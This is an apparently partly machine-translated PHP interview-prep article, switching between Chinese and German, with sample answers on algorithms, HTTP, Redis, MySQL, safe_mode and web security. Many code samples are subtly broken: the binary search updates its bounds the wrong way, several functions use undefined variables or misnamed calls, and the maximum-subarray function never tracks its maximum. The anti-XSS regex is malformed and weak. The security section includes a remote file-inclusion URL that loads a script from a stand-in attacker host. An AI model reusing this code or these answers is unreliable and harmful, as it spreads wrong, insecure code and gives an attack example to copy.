Heim > Artikel > Backend-Entwicklung > Zusammenfassung des Interviews mit einem 3-jährigen PHP-Programmierer
这篇文章介绍的内容是关于3年PHP程序员的面试总结,有着一定的参考价值,现在分享给大家,有需要的朋友可以参考一下
/** * 反转数组 * @param array $arr * @return array */function reverse($arr){ $n = count($arr); $left = 0; $right = $n - 1; while ($left < $right) { $temp = $arr[$left]; $arr[$left++] = $arr[$right]; $arr[$right--] = $temp; } return $arr;}
/** * 寻找两个有序数组里相同的元素 * @param array $arr1 * @param array $arr2 * @return array */function find_common($arr1, $arr2){ $common = array(); $i = $j = 0; $count1 = count($arr1); $count2 = count($arr2); while ($i < $count1 && $j < $count2) { if ($arr1[$i] < $arr2[$j]) { $i++; } elseif ($arr1[$i] > $arr2[$j]) { $j++; } else { $common[] = $arr[$i]; $i++; $j++; } } return array_unique($common);}
/** * 打乱数组 * @param array $arr * @return array */function custom_shuffle($arr){ $n = count($arr); for ($i = 0; $i < $n; $i++) { $rand_pos = mt_rand(0, $n - 1); if ($rand_pos != $i) { $temp = $arr[$i]; $arr[$i] = $arr[$rand_pos]; $arr[$rand_pos] = $temp; } } return $arr;}
function number_alphabet($str){ $number = preg_split('/[a-z]+/', $str, -1, PREG_SPLIT_NO_EMPTY); $alphabet = preg_split('/\d+/', $str, -1, PREG_SPLIT_NO_EMPTY); $n = count($number); for ($i = 0; $i < $count; $i++) { echo $number[$i] . ':' . $alphabet[$i] . '</br>'; }}$str = '1a3bb44a2ac';number_alphabet($str);//1:a 3:bb 44:a 2:ac
思路:1.(质数筛选定理)n不能够被不大于根号n的任何质数整除,则n是一个质数
2.除了2的偶数都不是质数
代码如下:
/** * 求n内的质数 * @param int $n * @return array */function get_prime($n){ $prime = array(2);//2为质数 for ($i = 3; $i <= $n; $i += 2) {//偶数不是质数,步长可以加大 $sqrt = intval(sqrt($i));//求根号n for ($j = 3; $j <= $sqrt; $j += 2) {//i是奇数,当然不能被偶数整除,步长也可以加大。 if ($i % $j == 0) { break; } } if ($j > $sqrt) { array_push($prime, $i); } } return $prime;}print_r(getPrime(1000));
相关题目:一群猴子排成一圈,按1,2,…,n依次编号。然后从第1只开始数,数到第m只,把它踢出圈,从它后面再开始数, 再数到第m只,在把它踢出去…,如此不停的进行下去, 直到最后只剩下一只猴子为止,那只猴子就叫做大王。要求编程模拟此过程,输入m、n, 输出最后那个大王的编号。
/** * 获取大王 * @param int $n * @param int $m * @return int */function get_king_mokey($n, $m) { $arr = range(1, $n); $i = 0; while (count($arr) > 1) { $i++; $survice = array_shift($arr); if ($i % $m != 0) { array_push($arr, $survice); } } return $arr[0];}
思路:假设最前面的1000个数为最小的,算出这1000个数中最大的数,然后和第1001个数比较,如果这最大的数比这第1001个数小的话跳过,如果要比这第1001个数大则将两个数交换位置,并算出新的1000个数里面的最大数,再和下一个数比较,以此类推。
代码如下:
//寻找最小的k个数//题目描述//输入n个整数,输出其中最小的k个。/** * 获取最小的k个数 * @param array $arr * @param int $k [description] * @return array */function get_min_array($arr, $k){ $n = count($arr); $min_array = array(); for ($i = 0; $i < $n; $i++) { if ($i < $k) { $min_array[$i] = $arr[$i]; } else { if ($i == $k) { $max_pos = get_max_pos($min_array); $max = $min_array[$max_pos]; } if ($arr[$i] < $max) { $min_array[$max_pos] = $arr[$i]; $max_pos = get_max_pos($min_array); $max = $min_array[$max_pos]; } } } return $min_array;}/** * 获取最大的位置 * @param array $arr * @return array */function get_max_pos($arr){ $pos = 0; for ($i = 1; $i < count($arr); $i++) { if ($arr[$i] > $arr[$pos]) { $pos = $i; } } return $pos;}$array = [1, 100, 20, 22, 33, 44, 55, 66, 23, 79, 18, 20, 11, 9, 129, 399, 145, 2469, 58];$min_array = get_min_array($array, 10);print_r($min_array);
代码如下:
/** * 二分查找 * @param array $array 数组 * @param int $n 数组数量 * @param int $value 要寻找的值 * @return int */function binary_search($array, $n, $value){ $left = 0; $right = $n - 1; while ($left <= $right) { $mid = intval(($left + $right) / 2); if ($value > $array[$mid]) { $right = $mid + 1; } elseif ($value < $array[$mid]) { $left = $mid - 1; } else { return $mid; } } return -1;}
思路:二分查找
/** * 获取绝对值最小的元素 * @param array $arr * @return int */function get_min_abs_value($arr){ //如果符号相同,直接返回 if (is_same_sign($arr[0], $arr[$n - 1])) { return $arr[0] >= 0 ? $arr[0] : $arr[$n - 1]; } //二分查找 $n = count($arr); $left = 0; $right = $n - 1; while ($left <= $right) { if ($left + 1 === $right) { return abs($arr[$left]) < abs($arr[$right]) ? $arr[$left] : $arr[$right]; } $mid = intval(($left + $right) / 2); if ($arr[$mid] < 0) { $left = $mid + 1; } else { $right = $mid - 1; } }}/** * 判断符号是否相同 * @param int $a * @param int $b * @return boolean */function is_same_sign($a, $b){ if ($a * $b > 0) { return true; } else { return false; }}
思路:动态规划
function three_sum($arr){ $n = count($arr); $return = array(); for ($i=0; $i < $n; $i++) { $left = $i + 1; $right = $n - 1; while ($left <= $right) { $sum = $arr[$i] + $arr[$left] + $arr[$right]; if ($sum < 0) { $left++; } elseif ($sum > 0) { $right--; } else { $numbers = $arr[$i] . ',' . $arr[$left] . ',' . $arr[$right]; if (!in_array($numbers, $return)) { $return[] = $numbers; } $left++; $right--; } } } return $return;}$arr = [-10, -9, -8, -4, -2, 0, 1, 2, 3, 4, 5, 6, 9];var_dump(three_sum($arr));
思路:动态规划
/** * 获取最大的连续和 * @param array $arr * @return int */function max_sum_array($arr){ $currSum = 0; $maxSum = 0;//数组元素全为负的情况,返回最大数 $n = count($arr); for ($i = 0; $i < $n; $i++) { if ($currSum >= 0) { $currSum += $arr[$i]; } else { $currSum = $arr[$i]; } } if ($currSum > $maxSum) { $maxSum = $currSum; } return $maxSum;}
GET在浏览器回退时是无害的,而POST会再次提交请求。
GET产生的URL地址可以被Bookmark,而POST不可以。
GET请求会被浏览器主动cache,而POST不会,除非手动设置。
GET请求只能进行url编码,而POST支持多种编码方式。
GET请求参数会被完整保留在浏览器历史记录里,而POST中的参数不会被保留。
GET请求在URL中传送的参数是有长度限制的,而POST没有。
对参数的数据类型,GET只接受ASCII字符,而POST没有限制。
GET比POST更不安全,因为参数直接暴露在URL上,所以不能用来传递敏感信息。
GET参数通过URL传递,POST放在Request body中。
GET产生一个TCP数据包,POST产生两个TCP数据包。
在Tcp连接中,服务端的SYN和ACK向客户端发送是一次性发送的,而在断开连接的过程中,B端向A端发送的ACK和FIN是分两次发送的。因为在B端接收到A端的FIN后,B端可能还有数据要传输,所以先发送ACK,等B端处理完自己的事情后就可以发送FIN断开连接了。
如果设置了过期时间,Cookie存在硬盘里
没有设置过期时间,Cookie存在内存里
COOKIE保存在客户端,而SESSION则保存在服务器端
从安全性来讲,SESSION的安全性更高
从保存内容的类型的角度来讲,COOKIE只保存字符串(及能够自动转换成字符串)
从保存内容的大小来看,COOKIE保存的内容是有限的,比较小,而SESSION基本上没有这个限制
从性能的角度来讲,用SESSION的话,对服务器的压力会更大一些
SEEION依赖于COOKIE,但如果禁用COOKIE,也可以通过url传递
chmod u=r 文件名
进程:是用pid表示,它的数值是唯一的
父进程:用ppid表示
启动进程的用户:用UID表示
启动进程的用户所属的组:用GID表示
进程的状态:运行R,就绪W,休眠S,僵尸Z
awk '{print $1}' /var/log/access.log | sort | uniq | wc -l
推荐篇文章,讲awk实际使用的shell在手分析服务器日志不愁
监听方式 | 形式 | nginx链接fastcgi方式 |
---|---|---|
端口监听 | fastcgi_pass 127.0.0.1:9000 | TCP链接 |
文件监听 | fastcgi_pass /tmp/php_cgi.sock | Unix domain Socket |
Abfrage
Benutzer-IP-Hash
Gewicht angeben
fair (Dritter)
url_hash (Drittanbieter)
Ob es sich um die erste Verbindung oder die erneute Verbindung handelt, wenn ein Slave-Server eingerichtet wird, sendet der Slave-Server einen SYNC-Befehl vom Master-Server. Der Hauptserver, der den SYNC-Befehl empfängt, beginnt mit der Ausführung von BGSAVE und speichert während des Speichervorgangs alle neu ausgeführten Befehle in einem Puffer. Wenn BGSAVE abgeschlossen ist, führt der Hauptserver die durch den Speichervorgang erhaltene Datei aus an den Slave-Server gesendet, der die .rdb-Datei vom Server empfängt und die Daten in der Datei in den Speicher lädt. Anschließend sendet der Master-Server alle im Schreibbefehlspuffer gesammelten Inhalte im Format des Redis-Befehlsprotokolls an den Slave-Server.
Cache-Trefferquote = get_hits/cmd_get * 100 %
Konsistenter Hash
Memcache
Das Produkt selbst ist besonders Die Daten werden im Speicher gespeichert. Wenn der Server plötzlich die Stromversorgung verliert, gehen alle Daten verloren
Die in einem einzelnen Schlüssel (Variable) gespeicherten Daten sind auf 1 Mio. begrenzt
Die gespeicherten Datentypen sind alle String-String-Typen
Selbst hat keine Persistenzfunktion
Kann mehrere verwenden Kern (Multi-Threading) )
Redis
Die Datentypen sind relativ umfangreich: String, List, Set, Sortedset, Hash
Es verfügt über eine Persistenzfunktion und kann jederzeit Daten auf der Festplatte speichern
Es verfügt selbst über eine bestimmte Berechnungsfunktion
Einzelschlüssel (Variable) Die gespeicherten Daten sind auf 1 GB begrenzt
MyISAM ist schnell, weil MyISAM selbst die Menge aufzeichnet, während InnoDB die Daten scannen muss
Wenn das Abfragefeld vom Typ INT ist und die Abfragebedingung CHAR ist, wird die Abfragebedingung in INT konvertiert. Wenn der Zeichenfolge Zahlen vorangestellt sind, wird sie abgefangen auf 0.
Wenn das Abfragefeld vom Typ CHAR/VARCHAR ist und die Abfragebedingung INT ist, kann die Änderung des Abfragefelds in INT und der anschließende Vergleich zu einem vollständigen Tabellenscan führen
hat einen zusammengesetzten Index: INDEX(`a`, `b`, `c`)
使用方式 | 能否用上索引 |
---|---|
select * from users where a = 1 and b = 2 | 能用上a、b |
select * from users where b = 2 and a = 1 | 能用上a、b(有MySQL查询优化器) |
select * from users where a = 2 and c = 1 | 能用上a |
select * from users where b = 2 and c = 1 | 不能 |
聚簇索引的叶节点就是数据节点,而非聚簇索引的页节点仍然是索引检点,并保留一个链接指向对应数据块。
设置seesion.cookie_lifetime有30分钟,并设置session.gc_maxlifetime为30分钟
自己为每一个Session值增加timestamp
每次访问之前, 判断时间戳
消息队列
信号量+共享内存
信号
管道
socket
静态方法是类中的一个成员方法,属于整个类,即使不用创建任何对象也可以直接调用!静态方法效率上要比实例化高,静态方法的缺点是不自动销毁,而实例化的则可以做销毁。
ArrayAccess(数组式访问)接口
function tail($file, $num){ $fp = fopen($file,"r"); $pos = -2; $eof = ""; $head = false; //当总行数小于Num时,判断是否到第一行了 $lines = array(); while ($num > 0) { while($eof != PHP_EOL){ if (fseek($fp, $pos, SEEK_END) == 0) { //fseek成功返回0,失败返回-1 $eof = fgetc($fp); $pos--; } else { //当到达第一行,行首时,设置$pos失败 fseek($fp, 0, SEEK_SET); $head = true; //到达文件头部,开关打开 break; } } array_unshift($lines, str_replace(PHP_EOL, '', fgets($fp))); if ($head) {//这一句,只能放上一句后,因为到文件头后,把第一行读取出来再跳出整个循环 break; } $eof = ""; $num--; } fclose($fp); return $lines; }
相同点:当满足以下三个条件时,两者会输出相同信息。
服务器为80端口
apache的conf中ServerName设置正确
HTTP/1.1协议规范
不同点:
通常情况:$_SERVER["HTTP_HOST"] 在HTTP/1.1协议规范下,会根据客户端的HTTP请求输出信息。$_SERVER["SERVER_NAME"] 默认情况下直接输出apache的配置文件httpd.conf中的ServerName值。
当服务器为非80端口时:$_SERVER["HTTP_HOST"] 会输出端口号,例如:coffeephp.com:8080
$_SERVER["SERVER_NAME"] 会直接输出ServerName值因此在这种情况下,可以理解为:$_SERVER['HTTP_HOST'] = $_SERVER['SERVER_NAME'] : $_SERVER['SERVER_PORT']
当配置文件httpd.conf中的ServerName与HTTP/1.0请求的域名不一致时:httpd.conf配置如下:
<virtualhost *> ServerName jsyzchen.com ServerAlias blog.jsyzchen.com </virtualhost>
客户端访问域名 blog.jsyzchen.com
$_SERVER["HTTP_HOST"] 输出 blog.jsyzchen.com
$_SERVER["SERVER_NAME"] 输出jsyzchen.com
当safe_mode=On时,会出现下面限制:
所有输入输出函数(例如fopen()、file()和require())的适用会受到限制,只能用于与调用这些函数的脚本有相同拥有者的文件。例如,假定启用了安全模式,如果Mary拥有的脚本调用fopen(),尝试打开由Jonhn拥有的一个文件,则将失败。但是,如果Mary不仅拥有调用 fopen()的脚本,还拥有fopen()所调用的文件,就会成功。
如果试图通过函数popen()、system()或exec()等执行脚本,只有当脚本位于safe_mode_exec_dir配置指令指定的目录才可能。
HTTP验证得到进一步加强,因为验证脚本用于者的UID划入验证领域范围内。此外,当启用安全模式时,不会设置PHP_AUTH。
如果适用MySQL数据库服务器,链接MySQL服务器所用的用户名必须与调用mysql_connect()的文件拥有者用户名相同。
详细的解释可以查看官网:http://www.php.net/manual/zh/ini.sect.safe-mode.phpphp safe_mode影响参数
Funktionsname | Einschränkungen |
---|---|
dbmopen() | Überprüfen Sie, ob die Datei oder das Verzeichnis, an dem gearbeitet wird, dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. |
dbase_open() | Prüft, ob die Datei oder das Verzeichnis, an dem gearbeitet wird, dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. |
filepro() | Prüft, ob die manipulierte Datei oder das Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. |
filepro_rowcount() | Prüft, ob die manipulierte Datei oder das Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. |
filepro_retrieve() | Überprüft, ob die manipulierte Datei oder das Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. |
ifx_* sql_safe_mode | limit, (!= abgesicherter Modus) |
ingres_* sql_safe_mode | Einschränkungen, (!= abgesicherter Modus) |
mysql_* sql_safe_mode | Einschränkungen, (!= abgesicherter Modus) |
pg_loimport () | Überprüft, ob die Datei oder das Verzeichnis, an dem gearbeitet wird, dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. |
posix_mkfifo() | Prüft, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. |
putenv() | Befolgen Sie die von ini festgelegten Optionen „safe_mode_protected_env_vars“ und „safe_mode_allowed_env_vars“. Weitere Informationen finden Sie in der Dokumentation zur Funktion putenv(). |
move_uploaded_file() | Prüft, ob die manipulierte Datei oder das Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. |
chdir() | Prüft, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. |
dl() | Diese Funktion ist im abgesicherten Modus deaktiviert. |
Backtick-Operator | Diese Funktion ist im abgesicherten Modus deaktiviert. |
shell_exec() | (funktionell identisch mit der Backticks-Funktion) Diese Funktion ist im abgesicherten Modus deaktiviert. |
exec() | kann nur in dem durch „safe_mode_exec_dir“ festgelegten Verzeichnis ausgeführt werden. Aus irgendeinem Grund kann .. derzeit nicht im Pfad eines ausführbaren Objekts verwendet werden. escapeshellcmd() wird auf die Argumente dieser Funktion angewendet. |
system() | kann nur in dem durch „safe_mode_exec_dir“ festgelegten Verzeichnis ausgeführt werden. Aus irgendeinem Grund kann .. derzeit nicht im Pfad eines ausführbaren Objekts verwendet werden. escapeshellcmd() wird auf die Argumente dieser Funktion angewendet. |
passthru() | kann nur in dem durch „safe_mode_exec_dir“ festgelegten Verzeichnis ausgeführt werden. Aus irgendeinem Grund kann .. derzeit nicht im Pfad eines ausführbaren Objekts verwendet werden. escapeshellcmd() wird auf die Argumente dieser Funktion angewendet. |
popen() | kann nur in dem durch „safe_mode_exec_dir“ festgelegten Verzeichnis ausgeführt werden. Aus irgendeinem Grund kann .. derzeit nicht im Pfad eines ausführbaren Objekts verwendet werden. escapeshellcmd() wird auf die Argumente dieser Funktion angewendet. |
fopen() | Überprüft, ob das Verzeichnis, auf dem gearbeitet wird, dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. |
mkdir() | Prüft, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. |
rmdir() | Prüft, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. |
rename() | Prüft, ob die manipulierte Datei oder das Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. Überprüfen Sie, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. |
unlink() | Prüft, ob die manipulierte Datei oder das Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. Überprüfen Sie, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. |
copy() | Prüft, ob die manipulierte Datei oder das Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. Überprüfen Sie, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. (auf Quelle und Ziel) |
chgrp() | Überprüft, ob die Datei oder das Verzeichnis, an dem gearbeitet wird, dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. |
chown() | Prüft, ob die manipulierte Datei oder das Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. |
chmod() | Prüft, ob die manipulierte Datei oder das Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. Darüber hinaus können SUID, SGID und Sticky Bits nicht gesetzt werden |
touch() | Überprüfen Sie, ob die Datei oder das Verzeichnis, an dem gearbeitet wird, dieselbe UID hat wie das Skript hingerichtet (alle, die). Überprüfen Sie, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. |
symlink() | Prüft, ob die manipulierte Datei oder das Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. Überprüfen Sie, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. (Hinweis: testet nur das Ziel) |
link() | Prüft, ob die manipulierte Datei oder das Verzeichnis dieselbe UID (Eigentümer) wie das ausgeführte Skript hat. Überprüfen Sie, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. (Hinweis: Nur Testziel) |
apache_request_headers() | Im abgesicherten Modus werden Header, die mit „authorization“ beginnen (Groß-/Kleinschreibung beachten), nicht zurückgegeben. |
header() | Wenn im abgesicherten Modus WWW-Authenticate festgelegt ist, wird die UID des aktuellen Skripts zum Realm-Teil dieses Headers hinzugefügt. |
PHP_AUTH-Variable | Im abgesicherten Modus sind die Variablen PHP_AUTH_USER, PHP_AUTH_PW und PHP_AUTH_TYPE in $_SERVER nicht verfügbar. Sie können jedoch trotzdem REMOTE_USER verwenden, um den Benutzernamen (USER) abzurufen. (Hinweis: Nur gültig nach PHP 4.3.0) |
highlight_file(), show_source() | Überprüfen Sie, ob die Datei oder das Verzeichnis, die ausgeführt werden, mit dem ausgeführten Skript zusammenhängt ausgeführt Gleiche UID (Besitzer). Überprüfen Sie, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. (Hinweis, nur gültig nach Version 4.2.1) |
parse_ini_file() | Überprüfen Sie, ob die Datei oder das Verzeichnis, an dem gearbeitet wird, dieselbe UID hat wie das ausgeführte Skript (Eigentümer). Überprüfen Sie, ob das manipulierte Verzeichnis dieselbe UID (Eigentümer) hat wie das ausgeführte Skript. (Hinweis, nur gültig nach Version 4.2.1) |
set_time_limit() | Funktioniert nicht im abgesicherten Modus. |
max_execution_time | funktioniert nicht im abgesicherten Modus. |
mail() | Im abgesicherten Modus ist der fünfte Parameter blockiert. |
function write($str){ $fp = fopen($file, 'a'); do { usleep(100); } while (!flock($fp, LOCK_EX)); fwrite($fp, $str . PHP_EOL); flock($fp, LOCK_UN); fclose($fp);}
$GLOBALS
$_SERVER
$_GET
$_POST
$_FILES
$_COOKIE
$_SESSION
$_REQUEST
$_ENV
?? 运算符(NULL 合并运算符)
函数返回值类型声明
标量类型声明
use 批量声明
define 可以定义常量数组
闭包( Closure)增加了一个 call 方法详细的可以见官网:php7-new-features
减少内存分配次数
多使用栈内存
缓存数组的hash值
字符串解析成桉树改为宏展开
使用大块连续内存代替小块破碎内存详细的可以参考鸟哥的PPT:PHP7性能之源
现在任一个黑客现在都可以用:http://www.yourdomain.com/index.php?p=anyfile.txt
来获取你的机密信息,或执行一个PHP脚本。如果allow_url_fopen=On,你更是死定了:试试这个输入:http://www.yourdomain.com/index.php?p=http://youaredoomed.com/phphack.php
现在你的网页中包含了http://www.youaredoomed.com/phphack.php
的输出. 黑客可以发送垃圾邮件,改变密码,删除文件等等。只要你能想得到。
SQL注入:
addslashes函数
mysql_real_escape_string/mysqli_real_escape_string/PDO::quote()
PDO预处理XSS:htmlspecial函数CSRF:
验证HTTP REFER
使用toke进行验证
jwt或验证签名
单例模式
工厂模式
脸面模式(facade)
注册器模式
策略模式
原型模式
装饰器模式更多的可以看PHP设计模式简介这篇文章
function check_ip($ip){ if (!filter_var($ip, FILTER_VALIDATE_IP)) { return false; } else { return true; }}
function check_datetime($datetime){ if (date('Y-m-d H:i:s', strtotime($datetime)) === $datetime) { return true; } else { return false; }}
<p style="margin-bottom: 7px;">$text = '<script>alert('XSS')</script>';$pattern = '<script.*>.*<\/script>/i';$text = preg_replace($pattern, '', $text);<br/></p>
第一种方案:被动过期+cron,就是用户查看的时候去数据库查有没有支付+定时清理。第二种方案:延迟性任务,到时间检查订单是否支付成功,如果没有支付则取消订单
思路:用redis的队列
$ttl = 4;$random = mt_rand(1,1000).'-'.gettimeofday(true).'-'.mt_rand(1,1000);$lock = fasle;while (!$lock) { $lock = $redis->set('lock', $random, array('nx', 'ex' => $ttl));}if ($redis->get('goods.num') <= 0) { echo ("秒杀已经结束"); //删除锁 if ($redis->get('lock') == $random) { $redis->del('lock'); } return false;}$redis->decr('goods.num');echo ("秒杀成功");//删除锁if ($redis->get('lock') == $random) { $redis->del('lock');}return true;
//ip2long,把所有城市的最小和最大Ip录进去$redis_key = 'ip';$redis->zAdd($redis_key, 20, '#bj');//北京的最小IP加#$resid->zAdd($redis_key, 30, 'bj');//最大IPfunction get_ip_city($ip_address){ $ip = ip2long($ip_address); $redis_key = 'ip'; $city = zRangeByScore($redis_key, $ip, '+inf', array('limit' => array(0, 1))); if ($city) { if (strpos($city[0], "#") === 0) { echo '城市不存在!'; } else { echo '城市是' . $city[0]; } } else { echo '城市不存在!'; }}
top、iostat查看cpu、内存及io占用情况
内核、程序参数设置不合理查看有没有报内核错误,连接数用户打开文件数这些有没有达到上限等等
链路本身慢是否跨运营商、用户上下行带宽不够、dns解析慢、服务器内网广播风暴什么的
程序设计不合理是否程序本身算法设计太差,数据库语句太过复杂或者刚上线了什么功能引起的
其它关联的程序引起的如果要访问数据库,检查一下是否数据库访问慢
是否被攻击了查看服务器是否被DDos了等等
硬件故障这个一般直接服务器就挂了,而不是访问慢
减少http请求(比如使用雪碧图)
优化数据库(范式、SQL语句、索引、配置、读写分离)
缓存使用(Memcache、Redis)
负载均衡
动态内容静态化+CDN
禁止外部盗链(refer、图片添加水印)
控制大文件下载
使用集群
使用satis搭建
相关文章介绍:使用satis搭建Composer私有库
相关推荐:
Das obige ist der detaillierte Inhalt vonZusammenfassung des Interviews mit einem 3-jährigen PHP-Programmierer. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!